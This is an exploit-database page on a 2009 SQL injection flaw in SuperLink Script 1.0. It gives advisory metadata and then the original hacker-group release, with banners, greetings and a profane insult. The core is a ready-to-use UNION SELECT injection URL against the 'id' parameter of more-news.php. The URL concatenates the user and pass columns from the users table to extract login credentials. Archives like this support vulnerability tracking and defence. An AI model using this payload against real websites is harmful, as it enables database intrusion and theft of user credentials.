SuperLink Script - exploit.company

vendor:

SuperLink Script

by:

./Red-D3v1L

CVSS

HIGH

SQL Injection

CWE

Product Name: SuperLink Script

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: YES

Related CWE: CVE-2009-4010

CPE: a:superlink:superlink_script

Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2009-4010/, https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-4010/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2009

SuperLink Script <== 1.0 (id) SQL Injection Vulnerability

SuperLink Script 1.0 is vulnerable to SQL Injection. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information such as usernames and passwords. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'more-news.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with malicious SQL code in the 'id' parameter.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

+===================================================================================+
            ./SEC-R1Z   _ __ _  _ _ _ ___ _ _ _ _   __  _ _ _ _ _           
            / /_ _ _ _ /   _ _\/   _ _ /\        \<   |/_ _ _ _ / 
            \ \_ _ _ _/  /___ /  /   __  |  |)   / |  |   /   /
             \_ _ _ _/  /___ /  /  | __ ||      /  |  |  /   /
              _______\  \_ _ \  \2_0_0_9 |      \  |  | /   /____
            /_ _ _ _ _\ _ _ _/\ _ _ _ /  |__|\ __\ |__|/_ _ _ _ _\ R.I.P MichaelJackson !!!!!
+===================================================================================+

        [?] ~ Note : sEc-r1z CrEw# r0x !
==============================================================================
        [?] SuperLink Script <== 1.0 (id) SQL Injection Vulnerability
==============================================================================
    [?] My home:              [ http://sec-r1z.com ]
    [?] Script:               [ SuperLink Script 1.0 ]
    [?] Language:             [ PHP ]
    [?] Vendor                [http://superlink.ps ]
    [?] Founder:              [ ./Red-D3v1L ]
    [?] Gr44tz to:            [ sec-r1z# Crew - Hackteach Team - My L0ve ~A~ ]
    [?] Fuck To :             [ Zombie_KsA << big big big L4m3r ] 
########################################################################
  
===[ Exploit SQL ]===
  
[»]SQL : http://server/[Path]/more-news.php?id=[inj3ct C0dE]
 
[»]dem0:

http://server/IT/more-news.php?id=-16/**/union/**/select/**/1,concat%28user,0x3e,pass%29,3,4,5,6,7,8+from+users
 

==============================================================================

#sEc-r1z.com Str1kEz y0u !